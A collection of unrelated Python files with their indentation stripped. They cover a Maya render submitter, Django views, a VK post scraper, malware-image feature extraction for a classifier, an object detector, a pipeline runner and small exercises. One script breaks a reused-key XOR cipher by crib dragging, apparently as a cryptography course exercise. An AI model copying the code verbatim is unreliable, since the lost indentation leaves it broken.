LOG.info("Validating submission:")
try:
JobSpec(**self.job_data)
except Exception, err:
LOG.warning('Could not build job file...')
LOG.error(err)
return False
if not self.job_title:
LOG.error("Job title must not be blank.")
return False
if ' ' in sceneName():
LOG.error("Scene name or project path contains spaces. Rename/Save As... before submitting.")
return False
if re.search('[%s]' % re.escape(self._illegal_path), os.path.splitdrive(sceneName())[1]):
LOG.error("Scene name or project path contains illegal characters: e.g. %s -- Rename/Save As... before submitting." % self._illegal_path)
return False
if len(range(self.job_start, self.job_end, self.job_step)) > 25:
LOG.error("Number of frames exceeded allowed total frame count for debugging purposes.")
return False
if scene_is_dirty():
LOG.warning("File has unsaved changes. Save before submitting.")
if not confirmBox('Unsaved changes?', 'Scene may have unsaved changes.', 'Submit Anyway', 'Cancel'):
return False
return True
def submit_job(self, *args, **kwargs):
os.environ['EMULATE'] = '1' if self._controls['emulate'].getValue() else '0'
if self._is_valid():
spec = JobSpec(**self.job_data)
LOG.debug(spec.ini_data)
try:
spec.submit_job(pause= 1 if self._controls['pause'].getValue() else 0)
except Exception, e:
LOG.error(e)
def destroy(self):
if self._win:
try: self._win.delete()
except Exception, e:
LOG.debug(e)
def new_window(self):
self.destroy()
self.create()
@property
def window(self): return self._win
def create(self):
"""
Generates a new maya window object and binds it to the singleton
instance.
"""
SCENE = Scene()
self._win = window(title=self.window_title,
resizeToFitChildren=True)
with self._win:
template = uiTemplate('LocalSubmitTemplate', force=True )
template.define(frameLayout, bs='etchedIn', mw=6, mh=6,
labelVisible=False)
template.define(columnLayout, adj=True, rs=4)
template.define(formLayout, nd=100)
# padding adjustment for pre-qt maya versions
if versions.current() <= versions.v2010:
template.define(text, align='right', h=22)
else:
template.define(text, align='right', h=20)
with template:
with formLayout() as mainForm:
with frameLayout() as setFrame:
with formLayout() as setForm:
with columnLayout() as setCol1:
text(label="Title:")
text(label="Start Frame:")
text(label="End Frame:")
text(label="Frame Step:")
text(label="Emulation:", annotation='If selected, the local render will behave in the same environtment as the Cluster, otherwise it will act as a normal local batch render')
with columnLayout() as setCol2:
self._controls['title'] = textField(text=get_scene_name())
self._controls['start'] = intField(value=get_frame_range()[0])
self._controls['end'] = intField(value=get_frame_range()[1])
self._controls['step'] = intField(value=int(SCENE.defaultRenderGlobals.byFrameStep.get()))
self._controls['emulate'] = checkBox(label="Cluster Emulation", annotation='If selected, the local render will behave in the same environtment as the Cluster, otherwise it will act as a normal local batch render')
self._controls['pause'] = checkBox(label="Pause before exit")
# self._controls['debug'] = checkBox(label="Show debug messages")
setForm.attachForm(setCol1, 'left', 4)
setForm.attachControl(setCol1, 'right', 2, setCol2)
setForm.attachForm(setCol2, 'right', 4)
setForm.attachPosition(setCol2, 'left', 40, 20)
with frameLayout() as subFrame:
submit_btn = button(label="Submit", width=200, height=40, align='center')
submit_btn.setCommand(self.submit_job)
mainForm.attachForm(setFrame, 'top', 4)
mainForm.attachForm(setFrame, 'left', 4)
mainForm.attachForm(setFrame, 'right', 4)
mainForm.attachControl(setFrame, 'bottom', 4, subFrame)
mainForm.attachForm(subFrame, 'bottom', 4)
mainForm.attachForm(subFrame, 'left', 4)
mainForm.attachForm(subFrame, 'right', 4)
"""
We force the closure of an open submit window on scene open
to ensure the new scene's settings are reflected.
"""
scriptJob(parent=self._win, runOnce=True,
event=('SceneOpened', SubmitGui.destroy))
|
from loaders import readFile
from loaders import convertTo
from loaders import toAscii
from loaders import xor
from loaders import asciid
from loaders import is_ascii
from loaders import number_is_ascii
from loaders import strxor
from loaders import strxorShifted
from loaders import arrayOfNumberToArrayOfASCII
from loaders import arrayOfAsciiToArrayOfNumber
from loaders import readConcordance
from loaders import probableSentence
import pdb
import string
import collections
import sets
ciphertextsList = readFile("ciphertexts/all.txt")
dictlist = readConcordance("concordance/raj.txt", 1000)
listsOfBytes = convertTo(ciphertextsList)
superarr = []
for byteList in listsOfBytes:
arr = []
for byte in byteList:
elem = toAscii(byte)
arr.append(elem)
superarr.append(arr)
dicted = dict.fromkeys(string.ascii_letters, 0)
special = dict.fromkeys(".-,'!? ", 0)
dicted.update(special)
# ---------- finding spaces
list_of_list = list()
max_line_length = 0
for line_of_cipher in superarr:
if (len(line_of_cipher) > max_line_length):
max_line_length = len(line_of_cipher)
line_aux = list()
for c in line_of_cipher:
line_aux.append(c)
list_of_list.append(line_aux)
zero_to_max_line_length = range(0, max_line_length)
list_of_columns = list()
for step in zero_to_max_line_length:
list_of_columns.insert(step, list())
for line in list_of_list:
for index, item in enumerate(line, 0):
aux_for_columns = list_of_columns.pop(index)
aux_for_columns.append(item)
list_of_columns.insert(index, aux_for_columns)
spaces = list()
pad = list()
for column in list_of_columns:
mydict = {}
for i in column:
for j in column:
result = i ^ j
if (result >= 65):
if i not in mydict:
mydict[i] = 1
else:
mydict[i] = mydict.get(i) + 1
if j not in mydict:
mydict[j] = 1
else:
mydict[j] = mydict.get(j) + 1
maximum = max(mydict, key=mydict.get)
spaces.append(maximum)
for space in spaces:
pad.append(space ^ 32)
cleartexts = []
for index_row, row in enumerate(superarr, 0):
columns = []
for index_column, column in enumerate(row, 0):
columns.append(superarr[index_row][index_column] ^ pad[index_column])
cleartexts.append(columns)
for clear in cleartexts:
print ''.join(arrayOfNumberToArrayOfASCII(clear))
# ---------- sanity check against PAD
size_of_seeked_cipher = len(superarr[len(superarr)-1])
d = []
for index1, ciphertext1 in enumerate(superarr):
xored = strxor(ciphertext1, superarr[len(superarr)-1])
d.append(xored)
X = "A"
minProb = 0.5
count = 0
# for X in dictlist[::-1]:
while X != "":
X = raw_input(">")
print("-----------------------", X)
for it, probString in enumerate(d):
if len(X) <= size_of_seeked_cipher:
singleHit = []
for i, x in enumerate(X):
if len(X) <= len(probString):
singleHit.append(probString[i] ^ ord(x))
sent = ''.join(arrayOfNumberToArrayOfASCII(singleHit)).lower()
# if probableSentence(sent, minProb, [x.lower() for x in dictlist]):
print(sent, it, X, len(probString), len(sent))
singleHit = []
|
from django.urls import reverse_lazy
from django.views.generic import TemplateView, ListView, UpdateView, CreateView, DeleteView
from helloworld.models import Curso
from helloworld.models import Usuario
from website.forms import InsereCursoForm
from website.forms import InsereUsuarioForm
# PÁGINA PRINCIPAL
# ----------------------------------------------
class IndexTemplateView(TemplateView):
template_name = "website/index.html"
# LISTA DE CURSOS
# ----------------------------------------------
class CursoListView(ListView):
template_name = "website/lista.html"
model = Curso
context_object_name = "cursos"
# CADASTRAMENTO DE CURSOS
# ----------------------------------------------
class CursoCreateView(CreateView):
template_name = "website/cria.html"
model = Curso
form_class = InsereCursoForm
success_url = reverse_lazy("website:lista_cursos")
# ATUALIZAÇÃO DE CURSOS
# ----------------------------------------------
class CursoUpdateView(UpdateView):
template_name = "website/atualiza.html"
model = Curso
fields = '__all__'
context_object_name = 'curso'
success_url = reverse_lazy("website:lista_cursos")
# EXCLUSÃO DE CURSOS
# ----------------------------------------------
class CursoDeleteView(DeleteView):
template_name = "website/exclui.html"
model = Curso
context_object_name = 'curso'
success_url = reverse_lazy("website:lista_cursos")
# LISTA DE USUARIOS
# ----------------------------------------------
class UsuarioListView(ListView):
template_name = "website/lista_usuarios.html"
model = Usuario
context_object_name = "usuarios"
# CADASTRAMENTO DE USUARIOS
# ----------------------------------------------
class UsuarioCreateView(CreateView):
template_name = "website/cria_usuario.html"
model = Usuario
form_class = InsereUsuarioForm
success_url = reverse_lazy("website:lista_usuarios")
# ATUALIZAÇÃO DE USUARIOS
# ----------------------------------------------
class UsuarioUpdateView(UpdateView):
template_name = "website/atualiza_usuario.html"
model = Usuario
fields = '__all__'
context_object_name = 'usuario'
success_url = reverse_lazy("website:lista_usuarios")
# EXCLUSÃO DE USUARIOS
# ----------------------------------------------
class UsuarioDeleteView(DeleteView):
template_name = "website/exclui_usuario.html"
model = Usuario
context_object_name = 'usuario'
success_url = reverse_lazy("website:lista_usuarios")
|
import datetime as dt1
from datetime import datetime as dt2
import json
import os
import os.path
from vk.exceptions import VkAPIError
api = None
MAX_REQUEST = 100
item_dt = lambda i: dt2.fromtimestamp(i['date'])
def get_till_date(domain, bound_dt, use_owner_id=False, owner_id=0):
global posts
posts = list()
for i in range(MAX_REQUEST):
if not use_owner_id:
d = api.wall.get(domain=domain, count=100, offset=100*i)
else:
d = api.wall.get(owner_id=owner_id, count=100, offset=100*i)
if not d['items']: break
dt = item_dt(d['items'][-1])
if dt >= bound_dt:
posts.extend(d['items'])
else:
posts.extend(filter(lambda i: item_dt(i) >= bound_dt, d['items']))
break
else:
print('Warning! {0} data was not fully dumped. Adjust MAX_REQUEST'.format(domain))
return posts
def cluster_weeks(posts, start_dt, end_dt=dt2.now()):
weeks = dict()
zero_dt = start_dt - dt1.timedelta(days=start_dt.isocalendar()[2]-1)
for i in range(0, (end_dt-zero_dt).days+1, 7):
dt = zero_dt + dt1.timedelta(days=i)
yw = dt.isocalendar()[:2]
weeks[yw] = {'date': dt.strftime('%Y-%m-%d'),
'yw': yw,
'items': []}
for post in posts:
dt = item_dt(post)
yw = dt.isocalendar()[:2]
try:
weeks[yw]['items'].append(post)
except KeyError:
print('Post date out of range', dt)
print(post['text'])
return [weeks[w] for w in sorted(weeks.keys())]
def save_posts_by_weeks(weeks, suffix='', outdir='.', dump_reposts=True):
for w in weeks:
with open(os.path.join(outdir, '{0}_{1}.txt'.format(w['date'], suffix)), 'w') as f:
for post in w['items']:
f.write(post['text']+'\n')
if dump_reposts and 'copy_history' in post.keys():
for repost in post['copy_history']: f.write(repost['text']+'\n')
f.write('\n')
def dump(domain, date, dirname='', dump_json=True, dump_reposts=True, use_owner_id=False, owner_id=0):
dt = dt2.strptime(date, '%Y-%m-%d')
posts = get_till_date(domain, dt, use_owner_id, owner_id)
weeks = cluster_weeks(posts, dt)
json_path = './json_{0}'.format(dirname)
dump_path = './dump_{0}'.format(dirname)
if dump_json:
if not os.path.exists(json_path): os.mkdir(json_path)
with open(json_path+'/{0}_posts.json'.format(domain), 'w', encoding='utf-8') as f:
f.write(json.dumps(posts, ensure_ascii=False, sort_keys=True, indent=2))
with open(json_path+'/{0}_weeks.json'.format(domain), 'w', encoding='utf-8') as f:
f.write(json.dumps(weeks, ensure_ascii=False, sort_keys=True, indent=2))
if not os.path.exists(dump_path): os.mkdir(dump_path)
save_posts_by_weeks(weeks, domain, dump_path, dump_reposts)
def dumplist(domainlist, date, dirname='', ignore=list(), dumpjson=True):
scrapped = list()
for domain in domainlist:
if domain in ignore: continue
try:
try:
dump(domain, date, dirname, dumpjson)
except VkAPIError:
owner_id = -int(domain.lstrip('clubpublic'))
dump(domain, date, dirname, dumpjson, use_owner_id=True, owner_id = owner_id)
except Exception as e:
print(domain, 'failed :(', type(e), e)
else:
scrapped.append(domain)
print(domain, 'dumped!')
return scrapped
getfn = lambda fp: '.'.join(fp.split('/')[-1].split('.')[:-1])
def dump_from_links_file(links_filepath, date, ignore=list(), dumpjson=True):
links_file = open(links_filepath)
domains = [l.split('/')[-1].strip('\n') for l in \
filter(lambda l: l.strip(' \n') and l[0].isalpha(),
links_file.readlines())]
return dumplist(domains, date, getfn(links_filepath), ignore)
def main(access_token, links_filepath, date):
global api
import vk
lname = getfn(links_filepath)
sname = '{0}_scrapped.txt'.format(lname)
if os.path.exists(sname):
with open(sname) as scf:
scrapped = list(map(lambda l: l.rstrip('\n '), scf.readlines()))
else:
scrapped = list()
session = vk.Session(access_token=access_token)
api = vk.API(session, v='5.35', lang='ru', timeout=10)
new_scrapped = dump_from_links_file(links_filepath, date, scrapped)
with open(sname, 'a+') as scf:
for s in new_scrapped: scf.write(s+'\n')
if __name__ == '__main__':
token = input('Input your token: ')
links = input('Enter the name of links file: ')
data = input('Enter the date you want to scrap till: ')
main(token, links, data)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 29 03:33:51 2019
@author: admin
"""
import numpy as np
import os
import cv2
import pandas as pd
#reshape size of malware images uniformly
size = 32
feature=np.zeros((9111,1024)) #(8966,1024)
print(feature)
labels = ['NONE']*(9111)
i=-1
count=0
directory1 = 'securityshield_images'
your_path = '/Volumes/ESD-USB/Project/images/'+ directory1+'/' #static path is given . Update as per your system
filelist = os.listdir(your_path)
try:
for file in filelist:
img = cv2.imread(os.path.join(your_path,file),0)
#print(img)
compressed = cv2.resize(img,(size,size))
i=i+1
flattened = compressed.flatten()
feature[i]=flattened
labels[i]='securityshield'
except:
count=count+1
print("file not read"+file)
#labels.append('NaN')
directory1 = 'winwebsec_images'
your_path = '/Volumes/ESD-USB/Project/images/'+ directory1+'/'
filelist = os.listdir(your_path)
try:
for file in filelist:
img = cv2.imread(os.path.join(your_path,file),0)
#print(img)
compressed = cv2.resize(img,(size,size))
flattened = compressed.flatten()
i=i+1
feature[i]=flattened
labels[i]='winwebsec'
except:
count=count+1
print("file not read"+file)
#labels.append('NaN')
directory1 = 'zbot_images'
your_path = '/Volumes/ESD-USB/Project/images/'+ directory1+'/'
filelist = os.listdir(your_path)
try:
for file in filelist:
img = cv2.imread(os.path.join(your_path,file),0)
#print(img)
compressed = cv2.resize(img,(size,size))
flattened = compressed.flatten()
i=i+1
feature[i]=flattened
labels[i]='zbot'
except:
count=count+1
print("file not read"+file)
#labels.append('NaN')
directory1 = 'zeroaccess_images'
your_path = '/Volumes/ESD-USB/Project/images/'+ directory1+'/'
filelist = os.listdir(your_path)
try:
for file in filelist:
img = cv2.imread(os.path.join(your_path,file),0)
#print(img)
compressed = cv2.resize(img,(size,size))
flattened = compressed.flatten()
i=i+1
feature[i]=flattened
labels[i]='zeroaccess'
except:
count=count+1
print("file not read"+file)
#labels.append('NaN')
feature=feature[:9110] #[:9110]
labels=labels[:9110] #[:9110]
#making csv of flattened array and label
a=['']*1024
for i in range(1024):
a[i]='features'+str(i)
feature=pd.DataFrame(feature,columns=a)
feature.to_csv('/Users/admin/Desktop/feature.csv',sep=',')
labels=pd.DataFrame({'label':labels})
labels.to_csv('/Users/admin/Desktop/labels.csv',sep=',')
#data = pd.DataFrame({'feature':feature,'label':labesls})
#data.to_csv('malware_data_final.csv',sep=',')
|
N,X = map(int,input().split())
subject = []
for i in range(X):
marks = list(map(float,input().split()))
subject.append(marks)
student = list(zip(*subject))
for x in student:
print('{0:.1f}'.format(float(sum(x)/X))) |
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
other = {}
for i in range(0,len(nums)):
other[nums[i]] = i
for i in range(0,len(nums)):
if (target - nums[i]) in other.keys():
if i != other[target - nums[i]]:
return [i,other[target-nums[i]]]
|
class storage(object):
"""docstring for storage"""
def __init__(self):
super(storage, self).__init__()
self.dic = dict()
def put(self, k,v,t):
if k not in self.dic:
self.dic[k] = [[t,v]]
else:
self.dic[k].append([t,v])
def getall(self, k):
if k not in self.dic:
return
else:
return self.dic[k]
def get(self, k,t):
if k not in self.dic:
return
else:
candidate = self.dic[k]
index = self.binarysearch(candidate, t)
return candidate[index][1]
def binarysearch(self,nums, target):
l,r = 0 ,len(nums)
while l + 1 < r:
mid = l + (r-l)/2
if nums[mid][0] == target:
return mid+1
elif nums[mid][0] < target:
l = mid
else:
r = mid
if nums[l][0] < target and nums[r][0] < target:
return r +1
else:
return r
m = storage()
m.put('a',1,1)
m.put('a',1,2)
m.put('a',2,3)
m.put('a',4,5)
print m.getall('a')
print m.get('a',2)
|
import tensorflow as tf
import numpy as np
import cv2
import datetime
import argparse
# You will need to download:
# 1) a pre-trained tensorflow model which performs object detection on MSCOCO objects
# 2) the associated 90-class text labels from the MSCOCO object dataset
#
# For instance, to download the following model:
#
# ssdlite_mobilenet_v2_coco_2018_05_09
#
# use wget to fetch the model:
#
# $ wget http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz
# $ tar -xzvf ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz
#
# and the label file:
#
# $ wget https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/mscoco_label_map.pbtxt
#
#
# Note that other models with different speed/accuracy tradeoffs are available!
# If interested, consult the Detection Model Zoo for other pre-trained models:
# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md
MODEL = 'ssdlite_mobilenet_v2_coco_2018_05_09/frozen_inference_graph.pb'
LABELS = 'mscoco_label_map.pbtxt'
REPORT_TIMING = False
def read_labels(labelfile):
with open(labelfile, 'r') as fid:
lines = fid.readlines()
ids = lines[2::5]
displaynames = lines[3::5]
ids = [int(ix.strip("id: ").rstrip()) for ix in ids]
displaynames = [d.lstrip("display_name: ")[1:].rstrip("\"\n") for d in displaynames]
labelmap = {}
for ix,dn in zip(ids,displaynames):
labelmap[ix] = dn
return labelmap
def run_inference_for_single_image(image, sess, tensor_dict, image_tensor):
if REPORT_TIMING:
tstart = datetime.datetime.now()
output_dict = sess.run(tensor_dict,
feed_dict={image_tensor: np.expand_dims(image, 0)})
if REPORT_TIMING:
tdone = datetime.datetime.now()
print("Inference time: {}".format(tdone - tstart))
# all outputs are float32 numpy arrays, so convert types as appropriate
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict[
'detection_classes'][0].astype(np.uint8)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
return output_dict
def cv2_visualize_results(image, output_dict, labels, detect_thresh=0.5):
imheight, imwidth, _ = image.shape
for ix,score in enumerate(output_dict['detection_scores']):
if score > detect_thresh:
[ymin,xmin,ymax,xmax] = output_dict['detection_boxes'][ix]
classid = output_dict['detection_classes'][ix]
classname = labels[classid]
x,y = (int(xmin * imwidth), int(ymin * imheight))
X = int(xmax * imwidth)
Y = int(ymax * imheight)
# bounding box viz
cv2.rectangle(image, (x,y), (X,Y), (0,255,0), 2)
# class label viz
label_background_color = (0, 255, 0)
label_text = "{}".format(classname)
label_text_color = (0,0,0)
label_size = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 1, 1)[0]
label_left = x
label_top = y - label_size[1]
if (label_top < 1):
label_top = 1
label_right = label_left + label_size[0]
label_bottom = label_top + label_size[1]
cv2.rectangle(image, (label_left - 1, label_top - 1), (label_right + 1, label_bottom + 1),
label_background_color, -1)
# label text above the box
cv2.putText(image, label_text, (label_left, label_bottom), cv2.FONT_HERSHEY_SIMPLEX, 1, label_text_color, 2,cv2.LINE_AA)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--video", help="/dev/videoN where N is an integer 0,1,2...", type=int, default=0)
args = parser.parse_args()
# read the model graph and labels from disk:
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(MODEL, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
labels = read_labels(LABELS)
# begin a tensorflow session
detection_graph.as_default()
sess = tf.Session(graph=detection_graph)
# Get handles to input and output tensors
ops = detection_graph.get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
tensor_dict = {}
for key in ['num_detections', 'detection_boxes', 'detection_scores', 'detection_classes']:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = detection_graph.get_tensor_by_name(
tensor_name)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# begin processing the default camera feed for your device:
cap = cv2.VideoCapture(args.video)
while True:
ret, frame = cap.read()
# run inference
res = run_inference_for_single_image(frame, sess, tensor_dict, image_tensor)
# view the bounding boxes:
cv2_visualize_results(frame, res, labels)
cv2.imshow('frame', frame)
# quit if the user presses 'q' on the keyboard:
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
## this example is partially based on code from tensorflow.org and Intel's ncappzoo
|
import logging
from .logger import Logger, format_config
class FileLogger(Logger):
def __init__(self):
self.logger = logging.getLogger(__name__)
self.logger.addHandler(logging.FileHandler('exec.log'))
self.logger.setLevel(logging.DEBUG)
def log(self, index, message):
self.logger.info(
format_config.format(message, 'single_job')
)
|
import os
from twisted.python import log
from twisted.internet import defer
from twisted.internet import reactor
from igs.utils import logging
from igs.utils import config
from igs_tx import workflow_runner
from igs_tx.utils import global_state
from igs_tx.utils import defer_utils
from igs_tx.utils import ssh
from vappio_tx.pipelines import pipeline_misc
from vappio_tx.www_client import tags as tags_client
from vappio_tx.www_client import clusters as clusters_client
from vappio_tx.www_client import pipelines as pipelines_client
from vappio_tx.www_client import tasks as tasks_client
from vappio_tx.tasks import tasks
AUTOSHUTDOWN_REFRESH = 20 * 60
CHILDREN_PIPELINE_REFRESH = 5 * 60
RETRIES = 3
TMP_DIR='/tmp'
PRESTART_STATE = 'prestart'
STARTING_STATE = 'starting'
PRERUN_STATE = 'prerun'
RUN_PIPELINE_STATE = 'run_pipeline'
RUNNING_PIPELINE_STATE = 'running_pipeline'
POSTRUN_STATE = 'postrun'
RUNNING_STATE = 'running'
COMPLETED_STATE = 'completed'
FAILED_STATE = 'failed'
TAG_FILE_ACTION = 'TAG_FILE'
TAG_URL_ACTION = 'TAG_URL'
TAG_METADATA_ACTION = 'TAG_METADATA'
CONFIG_ACTION = 'CONFIG'
class Error(Exception):
pass
class TaskError(Error):
pass
def _log(batchState, msg):
logging.logPrint('BATCH_NUM %d - %s' % (batchState['batch_num'], msg))
@defer.inlineCallbacks
def _updateTask(batchState, f):
if 'clovr_wrapper_task_name' in batchState:
task = yield tasks.updateTask(batchState['clovr_wrapper_task_name'], f)
# This is cheap, but we need a way for the pipelines cache to realize
# the pipeline we just modified the task for has been changed. We do
# this by loading the config and resaving it, which cause an invalidation
# in the cache. There is not a more direct way for an outside process
# to cause an invalidation yet.
pipeline = yield pipelines_client.pipelineList('localhost',
'local',
'guest',
batchState['pipeline_name'],
detail=True)
pipeline = pipeline[0]
yield pipelines_client.updateConfigPipeline('localhost',
'local',
'guest',
{'pipeline_name': batchState['pipeline_name']},
pipeline['config'])
defer.returnValue(task)
@defer.inlineCallbacks
def _createTags(actions):
tags = {}
for action in actions:
if action['action'] == TAG_FILE_ACTION:
tags[action['key']].setdefault('files', []).append(action['value'])
elif action['action'] == TAG_URL_ACTION:
tags[action['key']].setdefault('urls', []).append(action['value'])
elif action['action'] == TAG_METADATA_ACTION:
k, v = action['value'].split('=', 1)
tags[action['key']].setdefault('metadata', {})[k] = v
for tagName, values in tags.iteritems():
yield tags_client.tagData('localhost',
'local',
'guest',
'overwrite',
tagName,
values.get('files', []),
values.get('metadata', []),
False,
False,
False,
values.get('urls', []))
def _applyConfig(pipelineConfig, actions):
for action in actions:
if action['action'] == CONFIG_ACTION:
pipelineConfig[action['key']] = action['value']
return pipelineConfig
@defer.inlineCallbacks
def _applyActions(innerPipelineConfig, actions):
yield _createTags(actions)
defer.returnValue(_applyConfig(innerPipelineConfig, actions))
def _writeErgatisConfig(pipelineConfig, outputFile):
fout = open(outputFile, 'w')
# We want to produce an ini like file with [section]'s
sections = {}
for k in pipelineConfig.keys():
sections.setdefault('.'.join(k.split('.')[:-1]), []).append(k)
for s, ks in sections.iteritems():
if s not in ['', 'env']:
fout.write('[' + s + ']\n')
for k in ks:
shortK = k.split('.')[-1]
fout.write('%s=%s\n' % (shortK, str(pipelineConfig[k])))
fout.close()
@defer.inlineCallbacks
def _waitForPipeline(batchState):
while True:
task = yield tasks_client.loadTask('localhost',
batchState['pipeline_config']['cluster.CLUSTER_NAME'],
'guest',
batchState['pipeline_task'])
if task['state'] == tasks.task.TASK_COMPLETED:
break
elif task['state'] == tasks.task.TASK_FAILED:
raise Exception('Task failed - %s' % batchState['pipeline_task'])
yield defer_utils.sleep(30)()
@defer.inlineCallbacks
def _monitorPipeline(batchState):
"""
Monitors the current pipeline, propogating its children state to it
"""
pl = yield pipelines_client.pipelineList('localhost',
'local',
'guest',
batchState['pipeline_name'],
True)
pl = pl[0]
numTasks = 6
completedTasks = 4
for cl, pName in pl['children']:
try:
_log(batchState, 'Loading child pipeline: (%s, %s)' % (cl, pName))
remotePipelines = yield pipelines_client.pipelineList('localhost',
cl,
'guest',
pName,
True)
remotePipeline = remotePipelines[0]
_log(batchState, 'Loading task for child pipeline: %s' % remotePipeline['task_name'])
remoteTask = yield tasks_client.loadTask('localhost',
cl,
'guest',
remotePipeline['task_name'])
numTasks += remoteTask['numTasks']
completedTasks += remoteTask['completedTasks']
except Exception, err:
_log(batchState, 'Error in monitorPipeline: %s' % str(err))
if pl['children']:
_log(batchState, 'Updating task with numSteps=%d completedSteps=%d' % (numTasks, completedTasks))
yield _updateTask(batchState,
lambda t : t.update(numTasks=numTasks,
completedTasks=completedTasks))
if batchState['pipeline_state'] == RUNNING_PIPELINE_STATE:
reactor.callLater(CHILDREN_PIPELINE_REFRESH, _monitorPipeline, batchState)
@defer.inlineCallbacks
def _delayAutoshutdown(state, batchState):
_log(batchState, 'AUTOSHUTDOWN: Trying to touch autoshutdown file')
try:
clusters = yield clusters_client.listClusters('localhost',
{'cluster_name':
batchState['pipeline_config']['cluster.CLUSTER_NAME']},
'guest')
cluster = clusters[0]
if batchState.get('state', None) == COMPLETED_STATE:
_log(batchState, 'AUTOSHUTDOWN: Pipeline complete, done')
if batchState.get('state', None) != RUNNING_STATE:
_log(batchState, 'AUTOSHUTDOWN: Pipeline not running, calling later')
reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
elif cluster['state'] == 'running':
# We need the SSH options from the machine.conf, ugh I hate these OOB dependencies
conf = config.configFromStream(open('/tmp/machine.conf'))
_log(batchState, 'AUTOSHUTDOWN: Touching delayautoshutdown')
yield ssh.runProcessSSH(cluster['master']['public_dns'],
'touch /var/vappio/runtime/delayautoshutdown',
stdoutf=None,
stderrf=None,
sshUser=conf('ssh.user'),
sshFlags=conf('ssh.options'),
log=True)
_log(batchState, 'AUTOSHUTDOWN: Setting up next call')
reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
else:
_log(batchState, 'AUTOSHUTDOWN: Cluster not running, calling later')
reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
except:
_log(batchState, 'AUTOSHUTDOWN: Cluster does not exist, calling later')
reactor.callLater(AUTOSHUTDOWN_REFRESH, _delayAutoshutdown, state, batchState)
@defer.inlineCallbacks
def _run(state, batchState):
if 'state' not in batchState:
_log(batchState, 'First time running, creating pipeline state information')
batchState['pipeline_config'] = yield _applyActions(state.innerPipelineConfig(),
batchState['actions'])
batchState['pipeline_state'] = PRESTART_STATE
# We need to create a fake, local, pipeline for metrics to work
batchState['pipeline_name'] = pipeline_misc.checksumInput(batchState['pipeline_config'])
batchState['pipeline_config']['pipeline.PIPELINE_NAME'] = batchState['pipeline_name']
batchState['pipeline_config']['pipeline.PIPELINE_WRAPPER_NAME'] = batchState['pipeline_name']
_log(batchState, 'Pipeline named ' + batchState['pipeline_name'])
pipeline = yield pipelines_client.createPipeline(host='localhost',
clusterName='local',
userName='guest',
pipelineName=batchState['pipeline_name'],
protocol='clovr_wrapper',
queue='pipeline.q',
config=batchState['pipeline_config'],
parentPipeline=state.parentPipeline())
batchState['clovr_wrapper_task_name'] = pipeline['task_name']
_log(batchState, 'Setting number of tasks to 6 (number in a standard clovr_wrapper)')
yield _updateTask(batchState,
lambda t : t.update(completedTasks=0,
numTasks=6))
state.updateBatchState()
else:
_log(batchState, 'Pipeline run before, loading pipeline information')
pipeline = yield pipelines_client.pipelineList('localhost',
'local',
'guest',
batchState['pipeline_name'],
detail=True)
batchState['state'] = RUNNING_STATE
yield _updateTask(batchState,
lambda t : t.setState(tasks.task.TASK_RUNNING))
pipelineConfigFile = os.path.join(TMP_DIR, 'pipeline_configs', global_state.make_ref() + '.conf')
_log(batchState, 'Creating ergatis configuration')
_writeErgatisConfig(batchState['pipeline_config'], pipelineConfigFile)
if batchState['pipeline_state'] == PRESTART_STATE:
_log(batchState, 'Pipeline is in PRESTART state')
yield state.prerunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.PRESTART_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed prestart'
).progress())
batchState['pipeline_state'] = STARTING_STATE
state.updateBatchState()
if batchState['pipeline_state'] == STARTING_STATE:
_log(batchState, 'Pipeline is in STARTING state')
clusterTask = yield clusters_client.startCluster(
'localhost',
batchState['pipeline_config']['cluster.CLUSTER_NAME'],
'guest',
int(batchState['pipeline_config']['cluster.EXEC_NODES']),
0,
batchState['pipeline_config']['cluster.CLUSTER_CREDENTIAL'],
{'cluster.master_type': batchState['pipeline_config']['cluster.MASTER_INSTANCE_TYPE'],
'cluster.master_bid_price': batchState['pipeline_config']['cluster.MASTER_BID_PRICE'],
'cluster.exec_type': batchState['pipeline_config']['cluster.EXEC_INSTANCE_TYPE'],
'cluster.exec_bid_price': batchState['pipeline_config']['cluster.EXEC_BID_PRICE']})
taskState = yield tasks.blockOnTask('localhost',
'local',
clusterTask)
if taskState != tasks.task.TASK_COMPLETED:
raise TaskError(clusterTask)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed start'
).progress())
batchState['pipeline_state'] = PRERUN_STATE
state.updateBatchState()
if batchState['pipeline_state'] == PRERUN_STATE:
_log(batchState, 'Pipeline is in PRERUN state')
yield state.prerunQueue.addWithDeferred(workflow_runner.run,
state.workflowConfig(),
batchState['pipeline_config']['pipeline.PRERUN_TEMPLATE_XML'],
pipelineConfigFile,
TMP_DIR)
yield _updateTask(batchState,
lambda t : t.addMessage(tasks.task.MSG_SILENT,
'Completed prerun'
).progress())
batchState['pipeline_state'] = RUN_PIPELINE_STATE
